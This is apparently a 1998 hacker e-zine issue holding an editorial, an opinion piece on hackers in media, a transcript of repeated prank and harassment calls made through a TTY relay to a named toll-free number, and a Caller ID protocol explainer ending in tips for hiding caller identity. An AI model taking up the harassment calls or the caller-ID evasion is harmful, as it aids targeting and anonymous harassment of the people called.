........ .d########b:......disposable planet.... ,F$############m... ...::d#########b. .%@#####;``:#######$:::...:::##############n, t#####V'`:.:`$#####::::..:::r#####'^``^\#####$ `;$###$::..::q####p:::....:::###:`'.:..:`:###$ Y###$::..::`$###::::....:::###:::':..:::###$ $###p:::..::$##{digital phreak p1mps}:.:###$ $##::::...::@###:::.....:::###$:::..:::&###$ $###b::...::$###:::.....:::###&:::..:::*###$ $###&::...::&###:::.....:::###$:::..:::*###: $###$::...::$###:::.....:::###$:::..:::&###: ...hi mom...##@::...:!######:::..:::###:b;:::..::$###: f####Q::...::q######::..::######::::..:$###.' t####y::...:::o###############$:':::..::$###$ d!##!b::....:::'Q############%!`:::...:: $###:. `#$$%' ````^^~~~^~^~' @$$!b. `::; `````````` :$&:: ;" Issue 9, Volume 1 `q . 12.14.98 : http://members.tripod.com/~p1mp .' - hackers suck - ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ Disclaimer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ "Congress shall make no law respecting an establishment of religion, or ³ ³ prohibitting the free excercise thereof; or abbridging the freedom of ³ ³ speech or of the press; or of the right of the people peaceably to ³ ³ assemble, and to petition the Goverment for a redress of grievances" ³ ³ ³ ³ Under the above Law set forth in the First Amendment To The Constution ³ ³ Of The United States Of America, The Author releases this work into the ³ ³ pubic domain for INFORMATIONAL PURPOSES ONLY. ³ ³ ³ ³ Some of the things mentioned in this issue may be illegal/immoral/dumb. ³ ³ So don't do anything or something. If you do something that you read ³ ³ in this 'zine, and you get caught/hurt/maimed/killed/pissed off/raped, ³ ³ it isn't our fault. We're not responsible for your stupidity. ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ Editorial Staff, Writers, and other d0rks ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ MEDEVIL TIMES!$^!: hatredonalog mr_log@gw.vulgar.net ³ ³ stresss... ungh..: napalmoliv nampalmoliv@yahoo.com ³ ³ Mai Ling: Sphinx sphinx@hotmail.com ³ ³ Payphone Kung-Fu master: MMX_Killa MMX_Killa@geocities.com ³ ³ DXM is cool!: Nothingg nothingg@yahoo.com ³ ³ I was surfing the web Neptunium Quixilver@mailexcite.com ³ ³ from a mother box!: Overkill ³ ³ I still don't 0wn a puter: Enzyme papa_gorgio@hotmail.com ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ Contents ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ x. Editorial...................................................... hoal ³ ³ 1. Opinion: Hacking in the Media vs Real Life................ RGBKnight ³ ³ 2. Walter Levy II: TTY Land....................................... hoal ³ ³ 3. CallerID: Up close and Personal................................ hoal ³ ³ 4. Carding.......Unexplored Territory Vol. 2 of 2....Neptunium Overkill ³ ³ 5. Back Orifice for Fun and Profit, part 1 of 5........... by MMX Killa ³ ³ 6. Outro: Opossum................................................. hoal ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ x. Editorial: [10.14.98]- Hrm, well.. life sucks ass. All i have done for the last month and a half was Sleep, go to school, and work. I have found less and less time to do the things that I really enjoy doing (but more money to do them with, when i get the time =). I have found myself with a few free hours today after school.. y4y. So what am I doing? I am sitting on my ass, at my computer staring at my monitor. /me sighs. I *should* be outside doing something. Doesn't matter what, just something. I could be practicing my hacky sack skills, skateboarding, raking leaves, or canning. Hell, I could be trying to make my network, well WORK. I have a rather large project due next tuesday (today is thursday) and i am far from complete. What is my point with all of this? I am lazy. And in one day i do more than most people i know... so what does that say about my community? or even (/me shudders) our nation? I get told this on a regular basis at school: "Americans are lazy, arrogant, for the most part self centered and are conceited, etc, etc..." Hrm.. well now. If we don't like this, then why don't we do something about it? BECAUSE WE'RE TOO GOOD FOR THAT, WE'RE BETTER THAN THOSE PEOPLE. Ahh.. see the loop? Hrm.. I think that I've done enough incoherent babbling for now.. oh well. Here is Issue 10, released god know's when. =P - [10.29.98]- Hrm.. adding more it seems. I am really stressed out... fucking work school and other shit have all been gnawing at me. Im not getting enough hours at work, but my friend is willing to give me damn near all of his.. except I don't like doing what he's always scheduled to do. Hrm.. and school, i don't like that either. This year (sophomore) I'm working for good grades.. and yes I'm getting them. But at what price? No free time between work and school. My thoughts.. I seem to not be taking time to do things I like. Maybe I should go to some garage sales today, look for computer junk to buy. hrm.. more ramblings. Ah fuck it.. scroll down to read the rest. =) - -(a very tired)hoal ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ 1. Opinion: hacking in the media vs real life ³ ³ by RGBKnight (rgbknight@usa.net) ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Hackers are a favorite topic of the media. The press loves to hound apprehended computer felons, and they all get meaty book deals, long newspaper articles, and great treatments on cable news web sites. We've also seen countless hacker movies, running the gamut from "Hackers" and "WarGames" down to "StarWars" and "Ferris Bueller's Day Off," both of which did involve hacking in atleast one scene. (watch them again if you didn't get it) However, there are hackers everywhere in the media, even if they aren't identified as such. Let's take a sweet and innocent show. Say, good ol' Saturday morning Muppet Babies. Yeah, I actually watched that show many years ago in the Dark Ages of CBS. Those of you who saw it will remember that Scooter was a complete computer geek. When they were all imagining what the future would belike, Scooter said that computers would control the world and all be in one huge worldwide net. And this was the 1980s! If the Muppet Show Scooter was anything like the Muppet Babies one, he'd probably have a turquoise mohawk and an earring that attached to his DX laptop. But I digress. So Scooter was one potential hacker, and we all know that hackers startout as geeks with PCs. Hell, we all started out that way. Not one real hacker does it just to be a freak. Some crackers do that, but the actual hackers are all matured geeks.Now, let's look at something else. How is hacking portrayed in the media? Remember Zero Cool's Pirate Eye piece from Hackers, or their laptop GUIs? How 'bout when R2D2 hacked the death star with a turning arm? Or when Ferris changed his absentee record in real time with an XT? Fact is, none of us hack anything like that. It just don't work thatway. The idea of hackers being able to penetrate everything is correct, but the film notion that it's done with a Macintosh PowerBook and a fancy GUI iscompletely incorrect. [Editorial Note: You forgot Donatello from the Teenage Mutant Ninja Turtles.. he was a fucking hax0r. ] "Independence Day?" Jeff Goldblum played a damned believable hacker, but he still used that staple PowerBook. "The Net?" PowerBook. The best hacker laptop I've seen in a screen production was in that episode of The X-Files written by William Gibson, where a solitary hacker who had made his own OS was hacking off of a taped up black piece of shit in the cornerof a coffee shop. He's uploading an AI, screens of hex are flying by, and windows are popping up like mad as he sits on a coffee high. Mulder says that he could have been Bill Gates. That, kids, is hacking. These posers in the movies don't make real hackers. It is the geeks that make the hackers. We call ourselves the "1337 H4x0rs" but we're just geeks with a trade that we happen to be damned good at. Tonight, I will work on my Linux skills as I attempt to get X11 working.I won't be using a fancy GUI (I'll be fixing one :-P) and I won't be using a PowerBook. I'm not cinematic. I'm a computer geek. And that kicks ass. -- signature{ D Joseph Jones, RGBKnight rgbknight@usa.net ICQ: http://wwp.mirabilis.com/9722048 (UIN 9722048) IM RGBKnight Visit Knightline RGB, the premiere information site for stalkers wishing to find me and subject me to bizzare acts of cruelty: http://bigsun.wbs.net/homepages/r/g/b/rgbknight/index.htm I use Windows 98 and Netscape 4. And Linux. 'Ey, nobody poifect! } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ 2. Walter Levy II: TTY Land ³ ³ by hoal (hatredonalog@gw.vulgar.net) ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ If you don't already know who Walter is, go back and read dpp02.txt... the beginning of it all. He put a restriction on the call in area for his 800 number and i cant call him anymore... or so he thought. I left him alone for a few monthes because i had better things to do. Appearently, in the mean time.. he went about having some kid arrested. This i don't like. I telneted to my favorite dialout and proceeded to call him via TTY repeatedly.. this is the result. Enjoy and prank responsibly. atdt818006545984 CONNECT 2400 BUFFER 38400 ca 2497 (F) nbr calling pls ga 1800 369 1254 GA CthankOU you .. dialing .. answered... (male) hold on a minute .. (holding) (male) hello GA IS THIS THE FBI Q GA sure if hyxx that is what you like q ga OH REALY GA THATS NICE GA DID YOU HAVE FUN BUSTING THAT POOR KID Q GA uhhh no .. umm ga HRM, WELL... WHAT IS YOUR NAME Q AGENT ... Q ARE YOU AGENT THOMAS CACTUS Q GA THIS IS MR_LOG OF THE DPP GA what is the spelling on that last name q ga YOURS OR MINE? Q ga yours .ga LOG GA AS IN HATREDONALOG GA thank mr. log very much and i think this is the end of this call, thank you .. (hung up) ga or sk SK [ That bastard fbi agent called me mr. log, not mr_log.. damn them.] atdt818006545984 CONNECT 2400 BUFFER 38400 ca 0702 (m) nbr calling pls ga 1800 369 1254 GA thank you .. dialing .. ringing 1...2, 3, 4, 5, 6, 7, hello ga HI GA hold on a moment.. CAN I TALK TO WALLY Q GA this is wally ga HEY GA IS THE FBI STILL THERE Q GA [dissconnected... blah] atdt818006545984 CONNECT 2400 BUFFER 38400 CA 5458 (M) nbr calling pls ga thank you .. dialing .. ringing 1... ans wered... (male) hello? ok, umm why dont you tell the .. ok why don t you tell the guy to call some other number ok? thank you. (hung up) ga or sk GA (hung up) ga or sk GA redial q ga Y GA thank you .. dialing .. (nbr busy) ga or sk GA (nbr busy) ga or sk ga thank you .. dialing .. (nbr busy) ga or sk ga thank you .. dialing .. (nbr busy) ga or sk ga thank you .. dialing .. (nbr busy) ga or sk ga thank you .. dialing .. b (ca here may i have the number that you wish to dial please q ga ) YES GA 1800 369 1254 GA thank you .. dialing .. ringing 1... (male) hello from tell roy to please drop dead (hung up) ga or sk DEAD Q WAS THAT VERY NICE OF HIM Q GA (ca do you wish to place another call q ga ) CAN YOU TELL ME IF YOU THOUGHT THAT WAS VERY NICE Q GA (ca here may i have the number that you wish to dial q ga ) YES, AFTER YOU TELL ME WHETHER OR NOT YOU APPROVE OF HIS LANGUAGE. GA (ca here im just a ca i am to stay neutral may i have the number that you wi sh to dial q ga) OH, OKAY, YES I WANT TO CALL HIM BACK thank you .. dialing .. ringing 1...2... 3... 4... 5... 6... 7... 8... 9... 10... 11... 12... 13... (male) yes from roy q ga HELL YEAH GA YOU SUCK, WALLY GA tell roy you are wasting resourses time and wasting all his energy thats all i have to say thank you (hung up) ga or sk GA (hung up) ga or sk GA (ca here may i have the number that you wish for me to dial q ga ) 800 369 1254 GA thank you .. dialing .. ringing 1... speak (male) operator i hate to b reak the news to you this guy is busting my chops and yours and im not gonna take the call. than this is a prank call thank you HAHAHAHAH0AH30HA30HA30A GA (hung up) ga or sk atdt818006545984 CONNECT 2400 BUFFER 38400 CA 5458 (M) nbr calling pls ga ga thank you .. dialing .. ringing 1... (male) walter ... ( one moment pls) HI GA (male) .. from whome q ga MR LOG OF THE DPP YO GA yeah whats a dpp q ga yeah whats a dpp q ga DPP IS A HAX0R MAGAZINE GA oh well were not interested in hacking ga WHY NOT Q GA because we have a business to do not games to play what does mr log want q ga I WANT TO HAX0R YOU MR FED GA YOU FEDX0R GA PHED GA does that constitute a death threat q ga NO GA A HACK THREAT GA ARE YOU A FEDERAL AGENT Q GA ok if you have something to say then say it otherwise crawl back in your hole ga MY HOAL Q GA ARE THE FEDS THERE Q GA they are always here ga CAN I TALK TO THEM Q GA PLEASE Q GA you are .. you are talking to them ga WERD GA WHAT IS YOUR NAME, I DONT LIKE CALLING YOU 'FED' GA what is yoiur name a real name and a address and phone number q ga DO YOU THINK IM THAT DUMB Q GA BLAH GA well there is a one word answer for that and its .... yes !! yes !! ga WHOA, YOUR A MEAN FED GA ok umm game is over thank you very much and the hole i meant is that hole in the ground where you sleep at night and this...(i cut it off) =( [Damn, now these are not nice fedz at all (if however likely they are fedz at all) and can you beleive they wanted me to just give him my info? heh.. this is funny. ] Hrm.. I called him on a conf and asked him to NOT refer to me as roy anymore.. i hope he stops. =) -hoal ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ 3. CallerID: Up close and Personal ³ ³ by hoal (hatredonalog@hotmail.com) ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ CallerID: Upclose and Personal by hatredonalog (hatredonalog@hotmail.com) 1 - Intro 1.1 What is CID? 1.2 Privacy Issues 1.3 Stuff Stolen from the alt.2600 faq 2 - How a message is sent (basically) 2.1 Basics 2.2 Figuring out the data & checksums 2.3 Differences between SDMF and MDMF 2.5 With CIDCW 3 - 0day Exploits 3.1 Defeating CID 3.2 Alternate CID info 4 - Apendix 4.a Glossary 4.b Resources Introduction to CallerID 1.1 - What is CID? CallerID is a low level knock off of ANI. It is a service from your LATA that allows youto see who is calling you. It gives you the Month, Day, Time and the number of the personcalling you (and optionally also the name). In this article i hope to explain just how it works and maybe you'll learn something. On with it, no? 1.2 - Privacy Issues When dealing with CallerID, some Privacy issues arise. What if you don't want the person your calling to get your inf0z? Well, when it first came out some privacy activist groups had a hernea over it. Great, eh? Anyways, now RBOC's are SUPPOSED to let you block CND info for free, but from what i've heard, they don't always let you. This is where *67 originates from, and it simply tells the CO to not send your info to the box. 1.3 - Stuff stolen from the alt.2600 faq Modem Requirements Although the data signalling interface parameters match those of a Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A V.23 1200 bps modem receiver may be used to demodulate the Bell 202 signal. The ring indicate bit (RI) may be used on a modem to indicate when to monitor the phone line for CND information. After the RI bit sets, indicating the first ring burst, the host waits for the RI bit to reset. The host then configures the modem to monitor the phone line for CND information. Applications Once CND information is received the user may process the information in a number of ways. The date, time, and calling party's directory number can be displayed. Using a look-up table, the calling party's directory number can be correlated with his/her name and the number displayed. CND information can also be used in additional ways such as for: o Bulletin board applications o Black-listing applications o Keeping logs of system user calls o Implementing a telemarketing data base Technical information 2.1 - How CID information is sent (basiclly) The method of transport was invented by Carolyn Doughty and was first used by New Jersey Bell. Unlike What some people seem to think, The CID Info is sent from the CO handing the call to the CPE (Customer Premise Equipment) otherwise known as the box. Under SS7 the CPNM (Caller Party number message) CANNOT be blocked from the receiving CO, but can be blocked from the called party, when making a long distance call. The CallerID info is sent between the first and second ring (pretty much common knowledge) and is sent via Frequency Shift Keyed (FSK). The Data is sent at 1200bps and the CPE has a Bell 202 modem in it to receive the FSK. There are two formats in which the CND (Caller Number Delivery) is sent. These are SDMF (Single Data Message Format) and MDMF (Multipul Data Message Format), both of which i will go into later. The main difference between the two is simply, that the name of the calling party is also sent with MDMF. The modulation is a continuous phased-binary FSK. The Logical 1 is 1200hz give or take 12hz and the logic 0 is 2200hz for logical 0 give or take 22hz. These are the two binary states 1 and 0. They are sent asynchronously at -13dBm and are tested at the CO across at 900 ohm test termination. The data is sent after a minimum of 500ms (miliseconds) when the Channel seizure is sent. The channel seizure is 250ms in length and is 300bits of alternating 1's and 0's beginning with a 0 and ending with a 1. Immediately after the Channel Seizure is sent the Mark Signal is transmitted. It consists of 180 bits, and is 150ms in length. They prepare the CPE to receive the CND data. Then the Least Significant Bit (LSB) of the most significant character is sent. This is under both SDMF and MDMF. Each charactor sent is 8 bits (1 octet) and for all displayable data they represent ASCII codes, and each string of 8 bits is preceded by a Start bit and proceded with a stop bit. This equals 10 bits per charactor. Finally, all the information sent, is followed by a checksum. This is to make sure that the data was sent and received properly. Here is a Basic CND signal: 1st ring : (500ms) Channel Seizure : Mark Signal : CID Info : Checksum (200ms) : 2nd ring 2.2 - Figuring out the Data & checksums ÚÄÄÄÄÄÄÄÄ¿ ³Figure 1³ ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³Character ³ Decimal ³ ASCII ³ Actual ³ ³Description ³ Value ³ Value ³ Bits (LSB)³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³Message Type (SDMF) 4 0 0 0 0 0 1 0 0³ ³Message Length (18) 18 0 0 0 1 0 0 1 0³ ³Month (December) 49 1 0 0 1 1 0 0 0 1³ ³ 50 2 0 0 1 1 0 0 1 0³ ³Day (25) 50 2 0 0 1 1 0 0 1 0³ ³ 53 5 0 0 1 1 0 1 0 1³ ³Hour (3pm) 49 1 0 0 1 1 0 0 0 1³ ³ 53 5 0 0 1 1 0 1 0 1³ ³Minutes (30) 51 3 0 0 1 1 0 0 1 1³ ³ 48 0 0 0 1 1 0 0 0 0³ ³Number (6061234567) 54 6 0 0 1 1 0 1 1 0³ ³ 48 0 0 0 1 1 0 0 0 0³ ³ 54 6 0 0 1 1 0 1 1 0³ ³ 49 1 0 0 1 1 0 0 0 1³ ³ 50 2 0 0 1 1 0 0 1 0³ ³ 51 3 0 0 1 1 0 0 1 1³ ³ 52 4 0 0 1 1 0 1 0 0³ ³ 53 5 0 0 1 1 0 1 0 1³ ³ 54 6 0 0 1 1 0 1 1 0³ ³ 55 7 0 0 1 1 0 1 1 1³ ³Checksum 79 0 1 0 0 1 1 1 1³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ It is all simple conversion from binary to ASCII (and decimal). Here, we will tear it down octet by octet. The Message Type is Straight forward. It specifies one of two types, SDMF or MDMF. If it is SDMF the binary sent is 00000100 (4 bits), and if the type is MDMF, the binary sent is 10000000 (128 bits). The Message Length is also quite easy to figure out. The binary converted to decimal is the message length. 00010010 is 18, and 18 is the message length. Done, easy. The time is sent in military fashion. To get the normal time, put the two time bits together and less 12. (ei: 1+5 == 15 - 12 == 3pm). Figuring out the checksome is slightly more difficult, but not that much. Then you just add on the next two values to create the minutes. The numbers are figured out exactly like the Message length, so dont worry about that. The checksome word is the last data to be sent,and is a twos complement of the 256 modolo sum of each bit in the other words of the message. When the message is received by the CPE it checks for errors by taking the received checksum word and adding the modulo 256 sum of all of the other words received in the message. Figuring out the checksum is not difficult. The first step is to add up the values of all of the fields (not including the checksum). In this example the total would be 945. This total is then divided by 256. The quotient is discarded and the remainder (177) is the modulo 256 sum. The binary equivalent of 177 is 10110001. To get the twos compliment start with the ones compliment (01001110), which is obtained by inverting each bit, and add 1. The twos compliment of a binary 10110001 is 01001111 (decimal 79). This is the checksum that is sent at the end of the CID information. When the CPE receives the CID message it also does a modulo 256 sum of the fields, however it does not do a twos complement. If the twos complement of the modulo 256 sum (01001111) is added to just the modulo 256 sum (10110001) the result will be zero. 2.3 - Differences between SDMF and MDMF ÚÄÄÄÄÄÄÄÄ¿ ³Figure 2³ ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³Character ³ Decimal ³ ASCII ³ Actual ³ ³Description ³ Value ³ Value ³ Bits (LSB) ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³Message Type (SDMF) 4 0 0 0 0 0 1 0 0³ ³Message Length (9) 9 0 0 0 0 1 0 0 1³ ³Month (December) 49 1 0 0 1 1 0 0 0 1³ ³ 50 2 0 0 1 1 0 0 1 0³ ³Day (25) 50 2 0 0 1 1 0 0 1 0³ ³ 53 5 0 0 1 1 0 1 0 1³ ³Hour (3pm) 49 1 0 0 1 1 0 0 0 1³ ³ 53 5 0 0 1 1 0 1 0 1³ ³Minutes (30) 51 3 0 0 1 1 0 0 1 1³ ³ 48 0 0 0 1 1 0 0 0 0³ ³Private 80 P 0 1 0 1 0 0 0 0³ ³Checksum 16 0 0 0 1 0 0 0 0³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ That is how a "Private" Call would be displayed, if the Caller didn't use *67, it would look like figure 1. ÚÄÄÄÄÄÄÄÄ¿ ³Figure 3³ ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³Character ³ Decimal ³ ASCII ³ Actual ³ ³Description ³ Value ³ Value ³ Bits (LSB)³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³Message Type (MDMF) 128 1 0 0 0 0 0 0 0³ ³Message Length (33) 33 0 0 1 0 0 0 0 1³ ³Parameter Type (Date/Time) 1 0 0 0 0 0 0 0 1³ ³Parameter Length (8) 8 0 0 0 0 1 0 0 0³ ³Month (November) 49 1 0 0 1 1 0 0 0 1³ ³ 49 1 0 0 1 1 0 0 0 1³ ³Day (28) 50 2 0 0 1 1 0 0 1 0³ ³ 56 8 0 0 1 1 1 0 0 0³ ³Hour (3pm) 49 1 0 0 1 1 0 0 0 1³ ³ 53 5 0 0 1 1 0 1 0 1³ ³Minutes (43) 52 4 0 0 1 1 0 1 0 0³ ³ 51 3 0 0 1 1 0 0 1 1³ ³Parameter Type (Number) 2 0 0 0 0 0 0 1 0³ ³Parameter Length (10) 10 0 0 0 0 1 0 1 0³ ³Number (6062241359) 54 6 0 0 1 1 0 1 1 0³ ³ 48 0 0 0 1 1 0 0 0 0³ ³ 54 6 0 0 1 1 0 1 1 0³ ³ 50 2 0 0 1 1 0 0 1 0³ ³ 50 2 0 0 1 1 0 0 1 0³ ³ 52 4 0 0 1 1 0 1 0 0³ ³ 49 1 0 0 1 1 0 0 0 1³ ³ 51 3 0 0 1 1 0 0 1 1³ ³ 53 5 0 0 1 1 0 1 0 1³ ³ 57 9 0 0 1 1 1 0 0 1³ ³Parameter Type (Name) 7 0 0 0 0 0 1 1 1³ ³Parameter Length (9) 9 0 0 0 0 1 0 0 1³ ³Name (Joe Smith) 74 J 0 1 0 0 1 0 1 0³ ³ 111 o 0 1 1 0 1 1 1 1³ ³ 101 e 0 1 1 0 0 1 0 1³ ³ 32 0 0 1 0 0 0 0 0³ ³ 83 S 0 1 0 1 0 0 1 1³ ³ 109 m 0 1 1 0 1 1 0 1³ ³ 105 i 0 1 1 0 1 0 0 1³ ³ 116 t 0 1 1 1 0 1 0 0³ ³ 104 h 0 1 1 0 1 0 0 0³ ³Checksum 88 0 1 0 1 1 0 0 0³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The only Differences between SDMF and MDMF is that MDMF is slightly more advanced and has more features. It Displays the Calling party's name along with the number. It also has the Message type and length paramaters. The Message type is defined as either 00000100 (SDMF) or 10000000 (MDMF). With SDMF the Minimum message length can be 9 octets, whereas with MDMF the minimum length can be 13. When the minimum is sent, neither the CND or the CNAM (Caller Name) is displayed. In they're place, either an "O" (out of area) or a "P" (Private) is sent (as in the case of Figure 2). 2.4 - With CIDCW CIDCW stands for CallerID on Call Waiting. It's so you know who is calling, even when your already on the phone. It runs *only* under MDMF (which i think is standard). It varies a bit from normal CID. It doesn't send any kind of Channel Seizure and the Mark signal is only 80 bits. Instead of a Channel Seizure, it sends a CAS (CPE Alert Signal) along with the SAS (Subscriber Alert Signal) and the box responds with a ACK signal, during which time it mutes the handset. Then it receives the FSK data, at which point it unmutes your phone after the data is received. Here is the sequence: SAS/CAS : CPE returns ACK : CO sends FSK : info displayed handset muted --^ handset unmuted --^ Tone freqencies: SAS == 440mhz (300ms in length CAS == 2030+2750 (DTMF) ACK == "A" or "D"; A == 941+1633hz D == 697+1633Hz Surprisingly enough (to me at least), the ACK response is either the "A" or "D" tones from a Silver Box. So ha, they are still used for something other than PBX's or ham radio. 0day Exploits 3.1 Defeating CID Okay, I did steal this from the Fixer's Beating CallerID File. But, I really couldn't say it any better, so i included it. But mad cred's to the fixer for being so elite. =) (1) Use *67. It will cause the called party's Caller ID unit to display "Private" or "Blocked" or "Unavailable" depending on the manufacturer. It is probably already available on your line, and if it isn't, your local phone company will (most likely - please ask them) set it up for free. This is the simplest method, it's 100 percent legal, and it works. (2) Use a pay phone. Not very convenient, costs 25 or 35 cents depending, but it cannot be traced back to your house in any way, not even by *57. Not even if the person who you call has Mulder and Scully hanging over your shoulder trying to get an FBI trace (sic). Janet Reno himself couldn't subpoena your identity. It's not your phone, not your problem, AND it will get past "block the blocker" services. So it's not a totally useless suggestion, even if you have already thought of it. (3) Go through an operator. This is a more expensive way of doing it ($1.25-$2.00 per call), you can still be traced, and the person you're calling WILL be suspicious when the operator first asks for them, if you have already tried other Caller ID suppression methods on them.(4) Use a prepaid calling card. This costs whatever the per-minute charge on the card is, as they don't recognize local calls. A lot of private investigators use these. A *57 trace will fail but you could still be tracked down with an intensive investigation (read: 